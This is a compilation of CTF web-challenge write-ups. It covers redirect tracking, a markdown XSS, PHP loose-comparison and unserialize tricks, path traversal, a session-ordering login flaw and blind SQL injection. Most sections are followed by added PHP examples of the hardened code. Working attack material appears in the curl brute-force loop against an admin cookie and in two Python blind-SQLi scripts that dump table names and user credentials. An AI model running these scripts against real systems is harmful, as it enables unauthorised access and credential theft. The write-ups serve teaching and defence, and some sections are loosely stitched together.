Long road
(45 points, solved by 114)
Description: website is at http://cbmctf2019.cf:5000

Opening the given URL shows a page with a "cool" button. Clicking it sets off a chain of page redirects; the flag is in the cool9 request within that chain.

The flag is cbmctf{tracking_redirects!!}.
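The point of the challenge is that a browser (or curl with -L) follows the whole chain and only shows the last page, while the flag sits in an intermediate hop. The following PHP is an added example, not code from the write-up or the challenge: it walks a chain one hop at a time and records every response. The response table, the paths (/cool1 ... /cool3) and the hint text are constructed stand-ins; against a real server the $fetch callback would perform one non-following HTTP request per hop.

```php
<?php
// Added example (not from the write-up): inspect every hop of a redirect chain
// instead of letting the client follow it silently. All responses below are
// CONSTRUCTED samples; a real $fetch would issue one HTTP request per call
// with redirect-following disabled.

/** Return the Location header of a raw HTTP response, or null if absent. */
function locationOf(string $rawResponse): ?string
{
    $headerBlock = explode("\r\n\r\n", $rawResponse, 2)[0];
    foreach (explode("\r\n", $headerBlock) as $line) {
        if (preg_match('/^Location:\s*(\S+)/i', $line, $m)) {
            return $m[1];
        }
    }
    return null;
}

/** Parse the status code out of the status line ("HTTP/1.1 302 Found"). */
function statusOf(string $rawResponse): int
{
    return preg_match('#^HTTP/\d\.\d (\d{3})#', $rawResponse, $m) ? (int) $m[1] : 0;
}

/**
 * Follow the chain hop by hop. $fetch maps a path to its raw response.
 * Returns one [path, status, body] triple per hop, intermediate hops included.
 */
function trackRedirects(callable $fetch, string $start, int $maxHops = 20): array
{
    $hops = [];
    $path = $start;
    for ($i = 0; $i < $maxHops; $i++) {     // cap the walk: a chain may loop
        $raw    = $fetch($path);
        $status = statusOf($raw);
        $body   = explode("\r\n\r\n", $raw, 2)[1] ?? '';
        $hops[] = [$path, $status, $body];
        $next = locationOf($raw);
        if ($status < 300 || $status >= 400 || $next === null) {
            break;                            // final response reached
        }
        $path = $next;
    }
    return $hops;
}

// CONSTRUCTED chain: /cool1 -> /cool2 -> /cool3; the interesting text is in the
// body of the middle hop, which a client that auto-follows never displays.
$server = [
    '/cool1' => "HTTP/1.1 302 Found\r\nLocation: /cool2\r\n\r\n",
    '/cool2' => "HTTP/1.1 302 Found\r\nLocation: /cool3\r\n\r\nhint-in-intermediate-body",
    '/cool3' => "HTTP/1.1 200 OK\r\n\r\nfinal page",
];
$fetch = fn(string $p): string => $server[$p] ?? "HTTP/1.1 404 Not Found\r\n\r\n";

foreach (trackRedirects($fetch, '/cool1') as [$path, $status, $body]) {
    printf("%-7s %d %s\n", $path, $status, $body);
}
```

Run under PHP 7.4 or later (the arrow function needs it), the script prints one line per hop, and the second line carries the body of /cool2 that an auto-following client would have discarded. The $maxHops cap matters in practice: a chain that redirects to itself would otherwise never terminate.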
Points: 115
Solves: 136
Someone told me to use a lib, but real developers rock regex one-liners.
Service: http://marcodowno-01.play.midnightsunctf.se:3001
Author: avlidienbrunn is available for questions in #midnightsun @ freenode
Status: Online, last check at 2019-04-06 06:47:05 UTC

The input is transformed by the following JavaScript and then output. The text of a markdown image that ends up in the img tag's alt attribute is emitted as-is, so we use it to trigger XSS.

````javascript
function markdown(text){
    text = text.replace(/[<]/g, '')
        .replace(/----/g,'<hr>')
        .replace(/> ?([^\n]+)/g, '<blockquote>$1</blockquote>')
        .replace(/\*\*([^*]+)\*\*/g, '<b>$1</b>')
        .replace(/__([^_]+)__/g, '<b>$1</b>')
        .replace(/\*([^\s][^*]+)\*/g, '<i>$1</i>')
        .replace(/\* ([^*]+)/g, '<li>$1</li>')
        .replace(/##### ([^#\n]+)/g, '<h5>$1</h5>')
        .replace(/#### ([^#\n]+)/g, '<h4>$1</h4>')
        .replace(/### ([^#\n]+)/g, '<h3>$1</h3>')
        .replace(/## ([^#\n]+)/g, '<h2>$1</h2>')
        .replace(/# ([^#\n]+)/g, '<h1>$1</h1>')
        .replace(/(?<!\()(https?:\/\/[a-zA-Z0-9./?#-]+)/g, '<a href="$1">$1</a>')
        .replace(/!\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#]+)\)/g, '<img src="$2" alt="$1"/>')
        .replace(/(?<!!)\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#-]+)\)/g, '<a href="$2">$1</a>')
        .replace(/`([^`]+)`/g, '<code>$1</code>')
        .replace(/```([^`]+)```/g, '<code>$1</code>')
        .replace(/\n/g, "<br>");
    return text;
}
````
midnight{wh0_n33ds_libs_wh3n_U_g0t_reg3x?}
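The root cause is not the regex itself but that captured text is interpolated into an HTML attribute without escaping; removing "<" does nothing about a quote character. The following PHP is an added example, not code from the challenge or the write-up: it reproduces the image rule of the markdown() function above in PHP, once in the unsafe form and once with each captured group escaped for an attribute context. The input string is constructed.

```php
<?php
// Added example (not from the write-up): the image rule of the challenge's
// markdown() ported to PHP, vulnerable and hardened side by side.

// Vulnerable shape: $1 (alt text) and $2 (URL) are copied into a quoted
// attribute as-is. Stripping "<" first, as the challenge does, leaves '"'
// untouched, and one '"' is enough to leave the attribute.
function imageMarkdownVulnerable(string $text): string
{
    $text = str_replace('<', '', $text);
    return preg_replace(
        '/!\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9.\/?#]+)\)/',
        '<img src="$2" alt="$1"/>',
        $text
    );
}

// Hardened shape: build the tag in a callback and escape every captured group
// for an attribute context (ENT_QUOTES covers both quote characters). The URL
// group is already limited to http(s) by the pattern, which rules out other
// schemes such as javascript:.
function imageMarkdownSafe(string $text): string
{
    return preg_replace_callback(
        '/!\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9.\/?#]+)\)/',
        function (array $m): string {
            $alt = htmlspecialchars($m[1], ENT_QUOTES | ENT_HTML5, 'UTF-8');
            $src = htmlspecialchars($m[2], ENT_QUOTES | ENT_HTML5, 'UTF-8');
            return sprintf('<img src="%s" alt="%s"/>', $src, $alt);
        },
        $text
    );
}

// CONSTRUCTED input: alt text that contains a double quote followed by what
// looks like a second attribute.
$input = '![logo" title="x](http://example.com/a.png)';

echo imageMarkdownVulnerable($input), "\n";
echo imageMarkdownSafe($input), "\n";
```

The first line of output contains an img tag with a separate title="x" attribute that the author of the input controls; the second contains alt="logo&quot; title=&quot;x", a single harmless attribute. The same discipline applies to every other rule in the challenge's function: escape the captured text first, then wrap it in markup.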
I think I've found something interesting, but I'm not really a PHP expert. Do you think it's exploitable?

Opening the URL shows the page in the figure below.
```php
<?php
include '../func.php';
include '../config.php';

if (!$_COOKIE['otadmin']) {
    exit("Not authenticated.\n");
}

if (!preg_match('/^{"hash": [0-9A-Z\"]+}$/', $_COOKIE['otadmin'])) {
    echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n";
    exit();
}

$session_data = json_decode($_COOKIE['otadmin'], true);

if ($session_data === NULL) { echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n"; exit(); }

// Loose comparison: an integer "hash" from the cookie is compared with a hex string.
if ($session_data['hash'] != strtoupper(MD5($cfg_pass))) {
    echo("I CAN EVEN GIVE YOU A HINT XD \n");
    // Loop variable restored to $i (the scraped copy had dropped the "$").
    for ($i = 0; $i < strlen(MD5('xDdddddd')); $i++) {
        echo(ord(MD5($cfg_pass)[$i]) & 0xC0);
    }
    exit("\n");
}

display_admin();
```
```sh
for i in `seq 0 999`
do
    echo $i
    out=`curl gameserver.zajebistyc.tf/admin/login.php -b "otadmin={\"hash\": $i}"`
    echo $out
    if [ "`echo $out | grep 'p4{'`" ]; then break; fi
done
```
```
0
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    78    0    78    0     0    120      0 --:--:-- --:--:-- --:--:--   120
I CAN EVEN GIVE YOU A HINT XD 0006464640640064000646464640006400640640646400
(omitted)
389
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    58    0    58    0     0    160      0 --:--:-- --:--:-- --:--:--   160
Congratulations! p4{wtf_php_comparisons_how_do_they_work}
```
p4{wtf_php_comparisons_how_do_they_work}
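Two things make the check above fail open. The cookie regex accepts an unquoted number, so json_decode() hands the comparison an int rather than a string, and PHP 7's loose != converts the hex digest to a number for that comparison (a leading run of digits becomes that integer, a digest starting with a letter becomes 0). The "hint" loop then tells the client, for every position, whether the digest character is a digit (0) or a letter (64). The following PHP is an added example, not the challenge's code; the password is a constructed placeholder, and the strictCheck() function is the fix this page does not show.

```php
<?php
// Added example (not from the write-up): why the int-vs-string "!=" is
// bypassable on PHP 7, what the hint loop leaks, and the strict replacement.

$cfg_pass = 'placeholder-password';            // CONSTRUCTED, not the challenge's value
$expected = strtoupper(md5($cfg_pass));

// The challenge's test, with the negation removed: true means "accepted".
function looseCheck($submittedHash, string $expected): bool
{
    return $submittedHash == $expected;        // int == string: string is converted on PHP 7
}

// Fix: insist on a string and compare in constant time; no implicit casts.
function strictCheck($submittedHash, string $expected): bool
{
    if (!is_string($submittedHash)) {
        return false;
    }
    return hash_equals($expected, $submittedHash);
}

// What the hint loop reveals: ord('0'..'9') & 0xC0 is 0, ord('a'..'f') & 0xC0
// (and 'A'..'F') is 64, so the output is a digit/letter map of the digest.
function hintOf(string $hexDigest): string
{
    $out = '';
    for ($i = 0; $i < strlen($hexDigest); $i++) {
        $out .= ord($hexDigest[$i]) & 0xC0;
    }
    return $out;
}

// The integer PHP 7 derives from the digest: its leading decimal digits,
// or 0 when the digest starts with a letter.
function leadingDigits(string $hexDigest): int
{
    preg_match('/^\d*/', $hexDigest, $m);
    return (int) $m[0];                        // (int) "" is 0
}

$digest    = md5($cfg_pass);
$candidate = leadingDigits($digest);

printf("digest prefix : %s\n", substr($digest, 0, 8));
printf("hint          : %s\n", hintOf($digest));
printf("candidate int : %d\n", $candidate);
var_dump(looseCheck($candidate, $expected));
var_dump(strictCheck($candidate, $expected));
```

On PHP 7.x the first var_dump prints true and the second false; on PHP 8 both print false, because 8.0 changed int-vs-non-numeric-string comparison to compare as strings. That version dependence is exactly why the fix should not rely on the comparison operator at all: type-check the input and use hash_equals(). The write-up's loop stopping at 389 matches this model, since the hint string begins with three zeros (three leading digits) before the first 64.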
PHP's unserialization mechanism can be exceptional. Guest challenge by jvoisin.
Files at https://35c3ctf.ccc.ac/uploads/php-ff2d1f97076ff25c5d0858616c26fac7.tar. Challenge running at: nc 35.242.207.13 1
```php
<?php
$line = trim(fgets(STDIN));
$flag = file_get_contents('/flag');

class B {
    function __destruct() {
        global $flag;
        echo $flag;
    }
}

$a = @unserialize($line);
throw new Exception('Well that was unexpected…');
echo $a;
```
```
>nc.exe 35.242.207.13 1
O:1:"B":1
35C3_php_is_fun_php_is_fun
PHP Fatal error:  Uncaught Exception: Well that was unexpected… in /home/user/php.php:16
Stack trace:
#0 {main}
  thrown in /home/user/php.php on line 16
```
35C3_php_is_fun_php_is_fun
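The input O:1:"B":1 is a serialized object that is cut off before its property list. On the PHP versions of that time, unserialize() had already instantiated B when it hit the truncated data, and releasing the half-built object ran __destruct, so the flag was printed before the throw statement was ever reached. The following PHP is an added example, not the challenge's code: it shows the two mitigations PHP offers for this sink, namely refusing to instantiate any class during unserialize() and not accepting PHP's serialization format from untrusted input at all. The inputs are constructed.

```php
<?php
// Added example (not from the write-up): the challenge's sink with
// allowed_classes => false, and JSON as the alternative.

class B
{
    public function __destruct()
    {
        echo "B::__destruct ran\n";     // in the challenge this printed the flag
    }
}

// With allowed_classes => false, object syntax is still parsed but every class
// is replaced by __PHP_Incomplete_Class, which has no user code to run.
function parseUntrusted(string $line)
{
    return @unserialize($line, ['allowed_classes' => false]);
}

// CONSTRUCTED inputs: a complete serialized B, and the truncated form used in
// the session above.
$complete  = 'O:1:"B":0:{}';
$truncated = 'O:1:"B":1';

$obj = parseUntrusted($complete);
echo get_class($obj), "\n";
var_dump($obj instanceof B);

var_dump(parseUntrusted($truncated));

// Preferred when the data only needs to be structured, not typed: JSON decodes
// to arrays and scalars, so there is nothing for a destructor to hang off.
$data = json_decode('{"name":"guest"}', true, 512, JSON_THROW_ON_ERROR);
var_dump($data);
```

The first object comes back as __PHP_Incomplete_Class and is not an instance of B, the truncated input yields false, and "B::__destruct ran" never appears. If a class whitelist is genuinely needed, pass an array of class names instead of false; the default (true) is what makes every class with a __destruct, __wakeup or __toString reachable from the network.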
<?phperror_reporting(0);$fav_id = !empty($_GET['id']) ? $_GET['id'] : '1';header("Content-Type: image/x-icon");header("Pragma-directive: no-cache");header("Cache-directive: no-cache");header("Cache-control: no-cache");header("Cache-Control: no-store");header("Pragma: no-cache");header("Expires: 0");$favicon = $fav_id;$filepath = "./favicons/".$favicon;if(file_exists($filepath . ".png")) {$favicon = $filepath . ".png";}else if (file_exists($filepath . ".php")) {$favicon = $filepath . ".php";}else if (file_exists($filepath . ".ico")) {$favicon = $filepath . ".ico";}else {$err_msg = "No files named '$filepath.png', '$filepath.ico' or '$filepath.php' found ";echo $err_msg;die();}if(!file_exists($favicon)) {echo "File '$filepath' does not exist";die();}readfile($favicon);?>
```php
<!DOCTYPE html>
<html>
<head>
<?php
$favicon_id = mt_rand(1,7);
echo "<link rel='shortcut icon' href='favicon.php?id=$favicon_id' type='image/x-icon'>";
?>
<meta charset="UTF-8">
<title>El33t Articles Hub</title>
<link rel="stylesheet" href="css/bootstrap.min.css">
<style type="text/css">
#container {
    background-color: #fcf3cf ;
    width: 60%;
    border: 1px solid grey;
    padding: 10px;
    margin: auto;
    margin-top: 10px;
    margin-bottom: 30px;
}
#container p {
    padding: 10px;
    font-size: 16px;
}
#header {
    height: 100px;
    margin: 20px;
    text-align: center;
    font-size: 24px;
}
body {
    background-color: #f9e79f ;
}
</style>
</head>
<body>
<div id='header'><b><u> El33t Articles Hub </u> </b></div>
<div id='container'>
<?php
error_reporting(0);
require "fetch.php";
require "helpers.php";
$filename = !empty($_GET['file']) ? $_GET['file'] : "";
if($filename !== "") {
    $filename = sanitize($filename);
    $file_contents = read_article($filename);
    echo "<p>";
    echo $file_contents;
    echo "</p>";
}
else {
    $files = scandir('./articles');
    echo "<ul>";
    foreach($files as $i) {
        $temp = new SplFileInfo($i);
        $ext = $temp->getExtension();
        if($ext !== "txt")
            continue;
        $t = explode(".txt", $i)[0];
        echo "<li><h4><a href='?file=$t'> $t </a> </h4></li>";
    }
    echo "</ul>";
}
?>
</div>
<center><p> Copywrite © El33t Articles Hub </p></center>
</body>
</html>
```
```php
<?php
function article_not_found($name) {
    echo "<br><center>";
    echo "File \"$name\" not found !!";
    echo "</center>";
    die();
}

function sanitize($filename) {
    $evil_chars = array("php:", "secret/flag_7258689d608c0e2e6a90c33c44409f9d");
    foreach ($evil_chars as $value) {
        if( strpos($filename, $value) !== false) {
            echo "You naughty cheat !!<br>";
            die();
        }
    }
    // Sanitize input file name
    $bad_chars = array("./", "../");
    foreach ($bad_chars as $value) {
        $filename = str_replace($value, "", $filename);
    }
    $temp = new SplFileInfo($filename);
    $ext = $temp->getExtension();
    if( $ext !== "txt") {
        $filename = $filename.".txt";
    }
    return $filename;
}
?>
```
The flag is pctf{1h3-v41id41i0n_SuCk3d~r34l-baD}.
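Both files above decide what to read by string manipulation on the request: favicon.php appends an extension to whatever id was sent and checks only that the result exists, and sanitize() deletes "./" and "../" substrings and block-lists one file name, which are denylists on the input rather than a check on the resolved path. The following PHP is an added example, not the challenge's code: a resolver that canonicalises the path with realpath() and then requires it to lie inside the intended directory and carry an allowed extension. It builds a throwaway directory with constructed files so it runs stand-alone.

```php
<?php
// Added example (not from the write-up): resolve first, then decide, instead of
// stripping patterns out of the file name.

function safeReadArticle(string $baseDir, string $requested, array $allowedExt = ['txt']): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // No NUL bytes, and no stream wrappers ("php://", "file://", ...): a path
    // must be a plain relative file name.
    if (strpos($requested, "\0") !== false || preg_match('#^[a-z][a-z0-9+.-]*://#i', $requested)) {
        return null;
    }
    // Allow-list the extension rather than appending one.
    $ext = pathinfo($requested, PATHINFO_EXTENSION);
    if (!in_array(strtolower($ext), $allowedExt, true)) {
        return null;
    }
    // realpath() collapses "..", symlinks and repeated separators. The result
    // must start with the base directory plus a separator, so a sibling
    // directory whose name merely starts with the base name is rejected too.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return file_get_contents($full);
}

// CONSTRUCTED fixture: an articles/ directory with one article and a secret/
// directory next to it that must stay unreachable.
$root = sys_get_temp_dir() . '/articles_demo_' . getmypid();
mkdir("$root/articles", 0700, true);
mkdir("$root/secret", 0700, true);
file_put_contents("$root/articles/hello.txt", "hello article\n");
file_put_contents("$root/secret/flag.txt", "must not be readable\n");

var_dump(safeReadArticle("$root/articles", 'hello.txt'));
var_dump(safeReadArticle("$root/articles", '../secret/flag.txt'));
var_dump(safeReadArticle("$root/articles", 'hello'));
var_dump(safeReadArticle("$root/articles", 'php://filter/resource=hello.txt'));

// Remove the fixture.
unlink("$root/articles/hello.txt");
unlink("$root/secret/flag.txt");
rmdir("$root/articles");
rmdir("$root/secret");
rmdir($root);
```

Only the first call returns the article text; the traversal, the name without an allowed extension and the wrapper URL all return NULL. The check is on the canonical result, so it does not matter how the "../" was spelled or encoded on the way in, which is the property a substring denylist like sanitize() cannot provide.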
```php
<?php
session_start();
require "helpers.php";
if(! check_login())
    redirect($LOGIN_URL);
$id_type = $_SESSION['id_type'];
$id = $_SESSION['id'];
?>
<!DOCTYPE html>
<html>
<head>
<title>Homepage</title>
</head>
<body style='background-color: #d6eaf8'>
<p style="float: right"><a href='/logout.php'> Logout </a></p>
<p style="clear: both"></p>
<p style='height:30px; width:100%;'> </p>
<center>
<h2> Welcome User !! </h2>
<br><br>
<h3>
<?php
if($id_type === 'email') {
    echo "Email :- ".$id;
}
elseif ($id_type === 'team_name'){
    echo "Team Name :- ".$id ;
}
?>
</h3>
<br><br>
<h4>Here's a random funny saying for you :) <br></h4>
<br><br>
<?php
require "sayings.php";
printf(get_random_saying());
echo "<br><br>";
if($id === 'admin' && $id_type === 'team_name')
    printf(output_flag());
?>
</center>
</body>
</html>
```
```php
<?php
session_start();
require "helpers.php";
$type = $_POST['id_type'];
$identifier = $_POST['identifier'];
$password = $_POST['password'];
$_SESSION['id'] = $identifier;
if($type === 'team_name') {
    $team_name = $identifier;
    $_SESSION['id_type'] = 'team_name';
    if(verify_teamname_password($team_name, $password) === true) {
        $_SESSION['logged_in'] = true;
        redirect('/homepage.php');
    }
    else {
        die("Invalid Team Name-Password combination !!");
    }
}
elseif ($type === 'email') {
    $email = $identifier;
    $_SESSION['id_type'] = 'email';
    if(verify_email_password($email, $password) === true) {
        $_SESSION['logged_in'] = true;
        redirect('/homepage.php');
    }
    else {
        die("Invalid Email-Password combination !!");
    }
}
?>
```
pctf{4u1h3ntic4Ti0n.4nd~4u1horiz4ti0n_diff3r}
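In login.php the session's id and id_type are written before verify_*() is called, and the failure branch die()s without clearing them, while logged_in is only ever set, never cleared. The identity a session claims and the fact that it was authenticated are therefore updated independently, which is what the flag text alludes to. The following PHP is an added example, not the challenge's code: a login routine that changes the session only after the password check succeeds, and replaces the whole session state rather than patching fields. The verify_*() functions are constructed stand-ins for the challenge's helpers.php, which is not shown on the page, and $session stands in for $_SESSION so the script runs from the CLI.

```php
<?php
// Added example (not from the write-up): identity and logged_in are written
// together, once, after verification, and never on failure.

// CONSTRUCTED stand-ins for helpers.php: hashed credentials, checked with
// password_verify(). The stored hashes are computed on each run for brevity.
function verify_teamname_password(string $team, string $password): bool
{
    $store = ['admin' => password_hash('correct horse', PASSWORD_DEFAULT)];
    return isset($store[$team]) && password_verify($password, $store[$team]);
}

function verify_email_password(string $email, string $password): bool
{
    $store = ['user@example.com' => password_hash('battery staple', PASSWORD_DEFAULT)];
    return isset($store[$email]) && password_verify($password, $store[$email]);
}

/**
 * Attempt a login. Returns true and replaces $session on success; returns
 * false and leaves $session untouched on failure. $session plays the role of
 * $_SESSION here.
 */
function login(array &$session, string $type, string $identifier, string $password): bool
{
    if ($type === 'team_name') {
        $ok = verify_teamname_password($identifier, $password);
    } elseif ($type === 'email') {
        $ok = verify_email_password($identifier, $password);
    } else {
        $ok = false;
    }
    if (!$ok) {
        return false;                  // nothing about the session changes
    }
    // Replace, never merge: no field from a previous login survives, and the
    // three values are always written as one consistent unit.
    $session = ['logged_in' => true, 'id_type' => $type, 'id' => $identifier];
    // In a web context, call session_regenerate_id(true) at this point as well.
    return true;
}

// Regression check for the ordering bug: a successful login followed by a
// failed attempt with a different identity must leave the session as it was.
$session = [];
var_dump(login($session, 'email', 'user@example.com', 'battery staple'));
$before = $session;
var_dump(login($session, 'team_name', 'admin', 'wrong password'));
var_dump($session === $before);
print_r($session);
```

The three var_dump calls print true, false and true: the failed attempt neither changed id nor id_type, and logged_in was untouched, so homepage.php's authorization decision (id === 'admin' && id_type === 'team_name') can only ever see values that were verified together.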
Running this Python script takes a while, but produces the following result.

```python
import urllib
import urllib2
import base64

url = 'http://128.199.224.175:24000/'
table = ''
sql = "0' or ord(substr((select group_concat(table_name,':',column_name) from information_schema.columns where table_schema=database()),{},1))>{} #"
for pos in range(1, 200):
    for c in range(32, 127):
        sqli = sql.format(pos, c)
        params = { 'spy_name': base64.b64encode(sqli) }
        params = urllib.urlencode(params)
        req = urllib2.Request(url)
        req.add_header('test', 'application/x-www-form-urlencoded')
        req.add_data(params)
        res = urllib2.urlopen(req)
        r = res.read()
        # A short response means the "> c" test turned false, i.e. the character is c.
        if len(r) < 8000:
            table = table + chr(c)
            print(table)
            break
```
```
$ python aaa.py
s
sp
spi
spie
spies
spies:
spies:i
spies:id
(omitted)
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:emal
```

This shows that a "users" table exists with "username" and "password" columns. The same method retrieves the contents of the "users" table.
```python
import urllib
import urllib2
import base64

url = 'http://128.199.224.175:24000/'
table = ''
sql = "0' or ord(substr((select group_concat(username,':',password) from users),{},1))>{} #"
for pos in range(1, 200):
    for c in range(32, 127):
        sqli = sql.format(pos, c)
        params = { 'spy_name': base64.b64encode(sqli) }
        params = urllib.urlencode(params)
        req = urllib2.Request(url)
        req.add_header('test', 'application/x-www-form-urlencoded')
        req.add_data(params)
        res = urllib2.urlopen(req)
        r = res.read()
        if len(r) < 8000:
            table = table + chr(c)
            print(table)
            break
```
```
$ python bbb.py
a
ad
adm
admi
admin
(omitted)
admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?},test:test
```
The flag is pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}.
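The scripts above work because the base64-decoded spy_name is spliced into the SQL text, so a boolean condition in the name changes the size of the result set. The following PHP is an added example, not the challenge's code, which is not shown on the page: the same lookup written against an in-memory SQLite database, once in the concatenating form and once with a bound parameter, fed a probe of the same shape as the write-up's. The table, rows and probe are constructed; SQLite uses unicode() where MySQL uses ord() and has no "#" comment, so the probe is adapted accordingly.

```php
<?php
// Added example (not from the write-up): bound parameters make the injected
// condition a literal name that matches no row. Needs the pdo_sqlite extension.

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE spies (id INTEGER PRIMARY KEY, name TEXT, age INTEGER)');
$db->exec("INSERT INTO spies (name, age) VALUES ('Bond', 45), ('Bourne', 40)");   // CONSTRUCTED rows

// Vulnerable shape: the decoded spy_name becomes part of the statement text.
function findSpyVulnerable(PDO $db, string $name): array
{
    $sql = "SELECT name, age FROM spies WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed shape: the statement text is a constant and the value is bound. The
// database never parses the value as SQL, whatever quotes or keywords it holds.
function findSpySafe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT name, age FROM spies WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// CONSTRUCTED probe in the write-up's pattern (boolean test on one character),
// translated to SQLite syntax.
$probe = "0' or unicode(substr(name,1,1))>64 --";

print_r(findSpySafe($db, 'Bond'));
print_r(findSpySafe($db, $probe));
print_r(findSpyVulnerable($db, $probe));
```

The first call returns the single Bond row, the second returns an empty array because no spy is literally named "0' or unicode(...)", and the third returns both rows because the appended condition was executed. Since the challenge's front end base64-decodes spy_name before use, the decoding step is also the right place to enforce a length limit and an expected character set, but the parameter binding is what removes the injection regardless of what the decoded value contains.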